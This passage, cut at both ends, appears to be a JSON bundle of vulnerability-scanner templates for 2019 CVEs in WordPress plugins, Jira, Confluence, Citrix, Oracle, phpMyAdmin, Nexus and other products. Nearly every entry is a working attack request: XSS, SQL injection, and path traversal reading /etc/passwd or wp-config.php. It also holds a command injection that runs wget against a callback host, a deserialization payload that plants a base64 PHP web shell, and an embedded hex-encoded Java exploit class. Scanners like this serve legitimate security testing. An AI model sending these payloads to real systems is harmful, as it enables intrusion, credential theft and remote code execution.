index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   